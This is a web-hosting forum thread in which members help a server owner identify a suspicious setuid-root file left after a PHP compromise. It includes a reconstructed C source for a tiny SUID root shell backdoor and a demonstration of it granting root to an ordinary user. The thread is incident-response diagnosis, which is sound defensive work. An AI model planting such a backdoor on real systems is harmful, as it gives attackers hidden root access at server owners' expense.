Results 1 to 21 of 21
Thread: strange executable
-
11-17-2013, 07:16 PM #1Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
strange executable
Recently, one of my servers is compromised through some security hole in a php script (note: the server is running suPHP). I cleaned up the server but did not reinstall it. However, there is this file on the server - /usr/bin/grscnfg which I couldn't find any reference on the internet. This file has the permission set to -rwsr-xr-x so basically any user can run it. Is this something to worry about or is this a normal file? The ctime stat on the file is around the time when the server is compromised. I uploaded this file on virustotal and it's clean...
Any suggestions on what to do? Should I delete the file? Any advice would be greatly appreciated, thanks!Last edited by tonytz; 11-17-2013 at 07:20 PM.
-
11-18-2013, 07:02 AM #2Registered User
- Join Date
- Nov 2013
- Posts
- 103
Code:yum whatprovides '/usr/bin/grscnfg'
Code:file /usr/bin/grscnfg
If you don't want to nuke the server I guess the "best" you can do is bring it to a rescue mode (as long as it doesn't boot from the server's own hdd) and do a thorough scan with various tools.
-
11-18-2013, 12:04 PM #3Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
Yum whatprovides show that there is no matches. Similarly, it doesn't belong to any package according to rpm, so I just gzipped it and moved it to another folder. Not sure if this is useful to do at this stage - I reviewed the output of rpm -Va and nothing suspicious came up.
I really don't want to re-install the server but looks like it have to be done eventually. The attacker could potentially have gained root after the php script compromise, given that the server wasn't kept update with the patches.
Regardless, thanks very much for the tips.
-
11-18-2013, 08:01 PM #4Junior Guru Wannabe
- Join Date
- Apr 2011
- Location
- Melbourne
- Posts
- 93
You could try running the strings program over it to see if there is any hard coded error messages, callbacks, HTTP endpoints. Just note this won't do much if the binary has any level of obfuscation or encryption.
Code:strings /usr/bin/grscnfg
-
11-18-2013, 08:07 PM #5Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Would you be willing to send it to me?
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-18-2013, 08:18 PM #6Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
Here is the entire string output, though not sure what to make of it
[root@server src]# strings grscnfg
/lib64/ld-linux-x86-64.so.2
fff.
fffff.
l$ L
t$(L
|$0H
yjN:
0zjN:
__gmon_start__
libc.so.6
setuid
system
setgid
__libc_start_main
GLIBC_2.2.5
/lib64/ld-linux-x86-64.so.2
-
11-18-2013, 08:20 PM #7Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 08:23 PM #8Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
steve@rack911.com
From your strings output it looks like a SUID shell which would mean you were root compromised.
Send it to me and I will confirm.Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-18-2013, 08:42 PM #9Junior Guru Wannabe
- Join Date
- Apr 2011
- Location
- Melbourne
- Posts
- 93
Steven beat me to it, but those 3 system calls there would indicate it is a shell that runs as root.
It's probably something as simple as
PHP Code:int main (int argc, char *argv[])
{
setuid(0);
setgid(0);
system(argv[1]);
return 0;
}
-
11-18-2013, 08:47 PM #10Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
For onlookers to this thread this is definitely a malicious file.
As you can see I am logged in as user steven:
steven@steven.com [~]# grscnfg id
uid=0(root) gid=0(root) groups=0(root),502(steven)
steven@steven.com [~]#Nov 18 19:37:09 cpanel snoopy[7517]: [uid:501 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/grscnfg]: grscnfg id
Nov 18 19:37:09 cpanel snoopy[7518]: [uid:0 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/id]: id
It starts off as user:
7988 0000/0502 execve("/usr/bin/grscnfg", ["/usr/bin/grscnfg", "id"], [/* 25 vars */]) = 0
7988 0000/0502 setgid(0) = 0
7988 0000/0000 setuid(0) = 0
7989 0000/0000 execve("/bin/sh", ["sh", "-c", "id"], [/* 25 vars */]) = 0
7989 0000/0000 execve("/usr/bin/id", ["id"], [/* 25 vars */]) = 0
Definitely rooted.
I would see if your openssh packages are compromised aswell.Last edited by Steven; 11-18-2013 at 08:52 PM.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-18-2013, 08:48 PM #11Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-18-2013, 08:54 PM #12Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 08:56 PM #13Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 08:59 PM #14Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-18-2013, 09:19 PM #15Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 09:34 PM #16Registered User
- Join Date
- Nov 2013
- Posts
- 103
-
11-18-2013, 09:53 PM #17Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-18-2013, 10:19 PM #18Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 10:47 PM #19Junior Guru Wannabe
- Join Date
- Apr 2011
- Location
- Melbourne
- Posts
- 93
RPM only produces output if there is a verification failure, so I would hazard a guess that your SSHd hasn't been compromised. Better to be safe then sorry though.
-
11-18-2013, 10:57 PM #20Junior Guru Wannabe
- Join Date
- Sep 2011
- Posts
- 40
-
11-18-2013, 11:07 PM #21Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
That is a really old rpm package.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
Similar Threads
-
Resource and Executable
By mixmox in forum Hosting Security and TechnologyReplies: 2Last Post: 08-02-2011, 08:54 AM -
Website from executable only ?
By Lebanon in forum Programming DiscussionReplies: 5Last Post: 07-22-2007, 11:53 AM -
C++ compiler cannot create executable
By guest3 in forum Hosting Security and TechnologyReplies: 2Last Post: 01-21-2007, 07:28 AM -
Linux Executable
By hostbox in forum Programming DiscussionReplies: 4Last Post: 10-17-2004, 09:12 PM -
php non-executable?
By Mexico Joe in forum Hosting Security and TechnologyReplies: 2Last Post: 04-20-2003, 04:34 PM